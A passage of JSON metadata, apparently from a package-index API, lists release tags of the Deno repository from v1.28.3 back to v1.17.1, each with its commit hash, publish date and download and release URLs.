v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%